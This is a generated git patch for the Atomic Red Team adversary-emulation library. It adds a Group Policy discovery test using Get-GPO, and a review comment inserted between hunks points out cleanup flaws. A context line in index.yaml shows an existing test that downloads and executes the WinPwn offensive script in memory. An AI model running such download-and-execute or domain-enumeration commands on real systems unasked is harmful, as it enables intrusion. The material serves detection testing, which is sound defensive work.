From 2007ac5d8d4798121a9465d9d97523dfbe117b08 Mon Sep 17 00:00:00 2001
From: Atomic Red Team doc generator
Date: Tue, 17 May 2022 22:25:12 +0000
Subject: [PATCH] Generated docs from job=generate-docs branch=master [ci skip]
---
 atomics/Indexes/Indexes-CSV/index.csv | 1 +
 atomics/Indexes/Indexes-CSV/windows-index.csv | 1 +
 atomics/Indexes/Indexes-Markdown/index.md | 1 +
 .../Indexes/Indexes-Markdown/windows-index.md | 1 +
 atomics/Indexes/index.yaml | 35 +++++++++++
 atomics/T1615/T1615.md | 61 +++++++++++++++++++
 6 files changed, 100 insertions(+)
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index f2503b01..6514bf9a 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -935,6 +935,7 @@ discovery,T1615,Group Policy Discovery,1,Display group policy information via gp
 discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
 discovery,T1615,Group Policy Discovery,3,WinPwn - GPOAudit,bc25c04b-841e-4965-855f-d1f645d7ab73,powershell
 discovery,T1615,Group Policy Discovery,4,WinPwn - GPORemoteAccessPolicy,7230d01a-0a72-4bd5-9d7f-c6d472bc6a59,powershell
+discovery,T1615,Group Policy Discovery,5,MSFT Get-GPO Cmdlet,52778a8f-a10b-41a4-9eae-52ddb74072bf,powershell
 discovery,T1087.001,Local Account,1,Enumerate all accounts (Local),f8aab3dd-5990-4bf8-b8ab-2226c951696f,sh
 discovery,T1087.001,Local Account,2,View sudoers access,fed9be70-0186-4bde-9f8a-20945f9370c2,sh
 discovery,T1087.001,Local Account,3,View accounts with UID 0,c955a599-3653-4fe5-b631-f11c00eb0397,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 307e3d7a..41394156 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -668,6 +668,7 @@ discovery,T1615,Group Policy Discovery,1,Display group policy information via gp
 discovery,T1615,Group Policy Discovery,2,Get-DomainGPO to display group policy information via PowerView,4e524c4e-0e02-49aa-8df5-93f3f7959b9f,powershell
 discovery,T1615,Group Policy Discovery,3,WinPwn - GPOAudit,bc25c04b-841e-4965-855f-d1f645d7ab73,powershell
 discovery,T1615,Group Policy Discovery,4,WinPwn - GPORemoteAccessPolicy,7230d01a-0a72-4bd5-9d7f-c6d472bc6a59,powershell
+discovery,T1615,Group Policy Discovery,5,MSFT Get-GPO Cmdlet,52778a8f-a10b-41a4-9eae-52ddb74072bf,powershell
 discovery,T1087.001,Local Account,8,Enumerate all accounts on Windows (Local),80887bec-5a9b-4efc-a81d-f83eb2eb32ab,command_prompt
 discovery,T1087.001,Local Account,9,Enumerate all accounts via PowerShell (Local),ae4b6361-b5f8-46cb-a3f9-9cf108ccfe7b,powershell
 discovery,T1087.001,Local Account,10,Enumerate logged on users via CMD (Local),a138085e-bfe5-46ba-a242-74a6fb884af3,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 3bc982fd..954c4224 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1455,6 +1455,7 @@
 - Atomic Test #2: Get-DomainGPO to display group policy information via PowerView [windows]
 - Atomic Test #3: WinPwn - GPOAudit [windows]
 - Atomic Test #4: WinPwn - GPORemoteAccessPolicy [windows]
+ - Atomic Test #5: MSFT Get-GPO Cmdlet [windows]
 - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1087.001 Local Account](../../T1087.001/T1087.001.md)
 - Atomic Test #1: Enumerate all accounts (Local) [linux]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 5279ffba..4569f004 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -1065,6 +1065,7 @@
 - Atomic Test #2: Get-DomainGPO to display group policy information via PowerView [windows]
 - Atomic Test #3: WinPwn - GPOAudit [windows]
 - Atomic Test #4: WinPwn - GPORemoteAccessPolicy [windows]
+ - Atomic Test #5: MSFT Get-GPO Cmdlet [windows]
 - T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1087.001 Local Account](../../T1087.001/T1087.001.md)
 - Atomic Test #8: Enumerate all accounts on Windows (Local) [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index e73fe9f2..a8e5bbcc 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -60272,6 +60272,41 @@ discovery:
 iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
 GPORemoteAccessPolicy -consoleoutput -noninteractive
 name: powershell
+ - name: MSFT Get-GPO Cmdlet
+ auto_generated_guid: 52778a8f-a10b-41a4-9eae-52ddb74072bf
+ description: 'The Get-GPO cmdlet gets one Group Policy Object (GPO) or all the
+ GPOs in a domain. Tested on Windows Server 2019 as a domain user with computer
+ joined to domain. Reference: https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps'
+ supported_platforms:
+ - windows
+ input_arguments:
+ gpo_output:
+ description: The output of the Get-GPO cmdlet
+ type: String
+ default: "$env:temp\\GPO_Output.txt"
+ gpo_param:
+ description: You can specify a GPO by its display name or by its globally
+ unique identifier (GUID) to get a single GPO, or you can get all the GPOs
+ in the domain through the All parameter
+ type: string
+ default: "-All"
+ dependency_executor_name: powershell
+ dependencies:
+ - description: Add Rsat.ActiveDirectory.DS
+ prereq_command: if(Get-WindowsCapability -Online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0
+ | Where-Object { $_.State -eq 'Installed' }){ exit 0 } else { exit 1 }
+ get_prereq_command: Add-WindowsCapability -online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0
+ - description: 'Add Rsat.GroupPolicy.Management.Tools ###Two RSAT Modules needed
+ for this to work on Win10, WinServer 2019 works by default. This will take
+ a long time (almost 2 minutes) to install RSAT Manually###.'
+ prereq_command: if(Get-WindowsCapability -Online -Name Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0
+ | Where-Object { $_.State -eq 'Installed' }){ exit 0 } else { exit 1 }
+ get_prereq_command: Add-WindowsCapability -online -Name Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0
+ executor:
+ command: 'Get-GPO -Domain $ENV:userdnsdomain #{gpo_param} >> #{gpo_output}'
+ cleanup_command: del $env:temp\GPO_Output.txt -erroraction silentlycontinue
+ name: powershell
+ elevation_required: true
 T1016.001:
 technique:
 object_marking_refs:
diff --git a/atomics/T1615/T1615.md b/atomics/T1615/T1615.md
index 8f02187a..2f479c5d 100644
--- a/atomics/T1615/T1615.md
+++ b/atomics/T1615/T1615.md
@@ -14,6 +14,8 @@ Adversaries may use commands such as gpresult or various publicly a
 - [Atomic Test #4 - WinPwn - GPORemoteAccessPolicy](#atomic-test-4---winpwn---gporemoteaccesspolicy)
+- [Atomic Test #5 - MSFT Get-GPO Cmdlet](#atomic-test-5---msft-get-gpo-cmdlet)
+
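Review bot: The cleanup in the index.yaml hunk removes a hard-coded path, `cleanup_command: del $env:temp\GPO_Output.txt -erroraction silentlycontinue`, while the executor writes to `#{gpo_output}`, so an operator who overrides gpo_output leaves the GPO dump on disk after cleanup; because the command uses `>>`, repeated runs also keep appending to the same file. Reference the argument in cleanup as well, `cleanup_command: del #{gpo_output} -erroraction silentlycontinue`, and consider `>` if one run's output is meant to replace the previous one. The description says the test was run as a domain user, yet `elevation_required: true`; state which step needs the elevated session (presumably the Add-WindowsCapability prereqs rather than Get-GPO itself). The two input types are spelled `String` and `string`; pick one. The same command and cleanup text is repeated in the T1615.md section below, and since both files are generated the fix belongs in the source atomic definition they are built from.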
@@ -134,4 +136,63 @@ GPORemoteAccessPolicy -consoleoutput -noninteractive
+
+
+
+## Atomic Test #5 - MSFT Get-GPO Cmdlet
+The Get-GPO cmdlet gets one Group Policy Object (GPO) or all the GPOs in a domain. Tested on Windows Server 2019 as a domain user with computer joined to domain. Reference: https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 52778a8f-a10b-41a4-9eae-52ddb74072bf
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| gpo_output | The output of the Get-GPO cmdlet | String | $env:temp\GPO_Output.txt|
+| gpo_param | You can specify a GPO by its display name or by its globally unique identifier (GUID) to get a single GPO, or you can get all the GPOs in the domain through the All parameter | string | -All|
+
+
+#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
+
+
+```powershell
+Get-GPO -Domain $ENV:userdnsdomain #{gpo_param} >> #{gpo_output}
+```
+
+#### Cleanup Commands:
+```powershell
+del $env:temp\GPO_Output.txt -erroraction silentlycontinue
+```
+
+
+
+#### Dependencies: Run with `powershell`!
+##### Description: Add Rsat.ActiveDirectory.DS
+##### Check Prereq Commands:
+```powershell
+if(Get-WindowsCapability -Online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0 | Where-Object { $_.State -eq 'Installed' }){ exit 0 } else { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Add-WindowsCapability -online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0
+```
+##### Description: Add Rsat.GroupPolicy.Management.Tools ###Two RSAT Modules needed for this to work on Win10, WinServer 2019 works by default. This will take a long time (almost 2 minutes) to install RSAT Manually###.
+##### Check Prereq Commands:
+```powershell
+if(Get-WindowsCapability -Online -Name Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0 | Where-Object { $_.State -eq 'Installed' }){ exit 0 } else { exit 1 }
+```
+##### Get Prereq Commands:
+```powershell
+Add-WindowsCapability -online -Name Rsat.GroupPolicy.Management.Tools~~~~0.0.1.0
+```
+
+
+
+